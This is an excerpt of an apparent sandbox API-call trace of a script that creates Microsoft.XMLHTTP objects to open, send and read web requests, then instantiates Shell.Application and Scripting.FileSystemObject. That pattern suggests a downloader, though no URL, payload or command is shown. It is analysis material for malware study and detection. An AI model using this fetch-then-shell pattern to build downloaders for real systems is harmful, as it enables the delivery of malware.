	[0325.781] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0325.781] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0325.781] longjmp () 
	[0325.781] longjmp () 
	[0325.781] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0325.781] SysStringLen (param_1=0x0) returned 0x0
	[0325.781] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0325.781] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0325.781] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0325.782] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0325.782] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0325.782] ??2@YAPEAX_K@Z () returned 0x62f310
	[0325.782] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0325.782] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0325.782] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0325.782] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0325.782] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0325.782] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0325.782] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0325.782] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0325.782] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0325.783] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0325.783] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0326.040] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0326.040] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0326.040] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0326.040] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0326.041] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0326.041] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0326.041] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0326.041] SysStringLen (param_1=0x0) returned 0x0
	[0326.041] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0326.041] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0326.041] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0326.041] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0326.041] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0326.041] ??2@YAPEAX_K@Z () returned 0x62f350
	[0326.041] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0326.041] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0326.041] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0326.041] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0326.041] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0326.042] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0326.042] SysStringLen (param_1=0x0) returned 0x0
	[0326.042] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0326.044] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0326.044] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0326.044] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0326.044] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0326.044] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0326.044] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0327.431] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0327.431] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0327.431] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0327.433] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0327.433] SysStringLen (param_1=0x0) returned 0x0
	[0327.433] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0327.433] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0327.433] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0327.433] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0327.433] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c88) returned 0x0
	[0327.433] ??2@YAPEAX_K@Z () returned 0x62f310
	[0327.433] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c88, pUnkSite=0x62f310) 
	[0327.433] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0327.433] XMLHTTPRequest:IUnknown:Release (This=0x49c5c88) returned 0x0
	[0327.433] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0327.433] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0327.433] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0327.434] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0327.436] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0327.436] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0327.436] SysStringLen (param_1=0x0) returned 0x0
	[0327.436] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0327.436] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0327.436] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0327.436] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0327.436] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0327.436] ??2@YAPEAX_K@Z () returned 0x62f330
	[0327.437] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0327.437] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0327.437] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0327.437] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0327.437] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0327.437] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0327.437] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0327.437] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0327.437] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0327.437] SysStringLen (param_1=0x0) returned 0x0
	[0327.437] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0327.437] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0327.437] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0327.437] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0327.437] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c58) returned 0x0
	[0327.437] ??2@YAPEAX_K@Z () returned 0x62f310
	[0327.437] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c58, pUnkSite=0x62f310) 
	[0327.437] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0327.438] XMLHTTPRequest:IUnknown:Release (This=0x49c5c58) returned 0x0
	[0327.438] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0327.438] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0327.438] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
